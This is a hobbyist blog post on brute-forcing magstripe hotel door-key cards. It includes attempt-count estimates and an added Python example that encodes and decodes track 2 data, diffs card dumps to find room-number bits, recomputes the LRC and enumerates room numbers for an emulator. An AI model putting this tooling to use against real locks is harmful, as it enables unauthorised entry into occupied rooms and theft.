I was writing up the page for the Magomatic and started on the improvements section. I realized I started going on and on about a possible brute-forcing function and I decided that it would be better suited for a post instead of putting it on the page. So prepare yourself, as I am about to dump everything I can think of regarding brute forcing magstripe card door locks.
I was thinking that since I can just read card data with a computer, I should be able to read a room number off the card, alter that data to another room number, and put that information on my emulator. This would work in theory, but what if the card contains encrypted data? Then you would not know which bits represent the room number. What's more, what if the card does not conform to the track 2 standard? They could use their own protocol. Either way, all I will see are 1s and 0s.
Since the encrypted data is still only 1s and 0s, you could potentially try every possible combination of 1s and 0s until you found one that worked. By analyzing multiple cards of the same type (door keys, for example) you could see how much of the data changes from room to room or from date to date, and then reduce the brute-force search to just the bits that change. This may still be impractical: brute forcing n bits means trying up to 2^n combinations, so even 10 bits means 2^10 = 1024 attempts. It would probably take the magstripe reader about 1.5 - 2 seconds to deny a card. At 2 seconds per attempt, brute forcing 10 bits would take (1024 * 2) / 60 = 34.13 minutes in the worst case, assuming the lock keeps responding at that rate. That might not be worth the time.
Another option is to brute force each character rather than each bit. This only works if the magnetic stripe key follows a valid track format and is not encrypted. In that case you could just read the data on your computer and alter whatever you wanted, but what if you wanted a handheld device to do everything for you automatically? It is rather cumbersome to hook up a reader to a laptop, scan the card, alter the data, program a microcontroller, put the micro in your emulator, and then open a door. It would be much nicer to have a device that could just brute force open any door.
If one of these cards follows valid track 2 format, then you could brute force every 5-bit character (track 2 encodes each character as 4 data bits plus an odd-parity bit) rather than every single bit. However, now there are more possibilities per character than just a one or a zero. The 4 data bits allow 16 codes, but the ones that appear in card data are the ten digits 0-9 and the = field separator, so each character can hold 11 different values. I found this information by consulting this resource. Track 2 also allows up to 37 data characters between the start and end sentinel values. This means the total number of combinations you would have to brute force is 11^37 (about 3.4 x 10^38), far too many to be worth the time. In this case, the best thing to do is to analyze the data on a computer, figure out where the room number and/or expiration date is stored, and then program a microcontroller to try every possible room number while keeping the other data the same. It could also set the date to some date far in the future to ensure it would work. Better still, you could put an interface on the device to program the exact room number. Using a serial LCD and a few buttons, you could view the data after it is scanned into the device, then use the buttons to alter the data or just punch in the room number.
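As a worked example of the two ideas above (diffing several dumps to find the bits that change, and enumerating one field of a track 2 card while holding the rest constant), here is a small track 2 encoder/decoder with the analysis helpers. This is added example code, not the Magomatic code or anything from the original post. The card layout (issuer digits, 4-digit room, = separator, YYMM expiry, filler) and the dumps are constructed for illustration; the 2 seconds per rejected attempt is the figure assumed above.

```python
# Added example, not code from the original post or the Magomatic project.
# Track 2 per ISO 7811: 5 bits per character, 4 data bits recorded LSB first
# plus one odd-parity bit. The card layout and dumps below are constructed.

TRACK2_ALPHABET = "0123456789:;<=>?"   # code value = ord(c) - 0x30
START_SENTINEL = ";"
END_SENTINEL = "?"


def encode_char(c):
    """Return the 5 bits (4 data bits LSB first, then odd parity) for one character."""
    v = TRACK2_ALPHABET.index(c)
    bits = [(v >> i) & 1 for i in range(4)]
    bits.append(0 if sum(bits) % 2 else 1)   # make the total number of ones odd
    return bits


def decode_char(bits):
    """Inverse of encode_char; raises on a parity error."""
    if sum(bits) % 2 != 1:
        raise ValueError("track 2 parity error in %r" % (bits,))
    return TRACK2_ALPHABET[sum(b << i for i, b in enumerate(bits[:4]))]


def lrc(chars):
    """Longitudinal redundancy check: XOR of the 4-bit values of every
    character from the start sentinel through the end sentinel."""
    v = 0
    for c in chars:
        v ^= TRACK2_ALPHABET.index(c)
    return TRACK2_ALPHABET[v]


def encode_track2(data):
    """Data characters -> bit string laid out as ';' data '?' LRC."""
    chars = START_SENTINEL + data + END_SENTINEL
    chars += lrc(chars)
    return "".join("".join(str(b) for b in encode_char(c)) for c in chars)


def decode_track2(bitstring):
    """Bit string as read from the stripe -> data characters, checking the
    sentinels and the LRC. Leading clocking zeros are skipped: ';' encodes
    as 11010, so the first 1 bit is the sync point."""
    bits = [int(b) for b in bitstring.lstrip("0")]
    chars = []
    for i in range(0, len(bits) - 4, 5):
        chars.append(decode_char(bits[i:i + 5]))
        if len(chars) > 1 and chars[-2] == END_SENTINEL:
            break                      # chars[-1] is the LRC; ignore trailing bits
    if len(chars) < 3 or chars[0] != START_SENTINEL or chars[-2] != END_SENTINEL:
        raise ValueError("sentinels not found")
    if chars[-1] != lrc(chars[:-1]):
        raise ValueError("LRC mismatch")
    return "".join(chars[1:-2])


def changing_bits(dumps):
    """Bit positions that differ across several dumps of the same card type."""
    width = min(len(d) for d in dumps)
    return [i for i in range(width) if len({d[i] for d in dumps}) > 1]


def changing_chars(dumps):
    """Same information as 5-bit character positions (0 = start sentinel)."""
    return sorted({i // 5 for i in changing_bits(dumps)})


def minutes_to_brute_force(n_bits, seconds_per_attempt=2.0):
    """Worst-case time to try every value of n_bits at the reader's reject rate."""
    return (2 ** n_bits) * seconds_per_attempt / 60.0


def room_candidates(template, start, width):
    """Yield the template data with every value of one numeric field substituted,
    everything else (issuer digits, expiry, filler) held constant."""
    for n in range(10 ** width):
        yield template[:start] + str(n).zfill(width) + template[start + width:]


# Constructed dumps: issuer 5550, 4-digit room, '=', expiry YYMM 1301, 4 filler digits.
CARDS = [encode_track2("5550%s=13010000" % room) for room in ("0101", "0102", "0215")]

if __name__ == "__main__":
    print("bit positions that change:", changing_bits(CARDS))
    print("character positions that change:", changing_chars(CARDS))
    print("minutes for 10 bits at 2 s/attempt:", minutes_to_brute_force(10))
    for card in room_candidates("55500101=13010000", 4, 4):
        pass                           # feed each candidate to the emulator here
    print("last candidate tried:", card)
```

Diffing two cards whose room numbers differ only in the last digit shows changes in exactly two characters: the room digit itself and the LRC at the end, which is why the LRC must be recomputed rather than copied when a field is altered on the emulator.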
Brute forcing these things seems mostly impractical because it would take forever to brute force all the data on a card, but in the event of encryption it may be necessary. If you can narrow the search down to just a few bits, it would be worth it. I'll have to experiment once I have some data to analyze.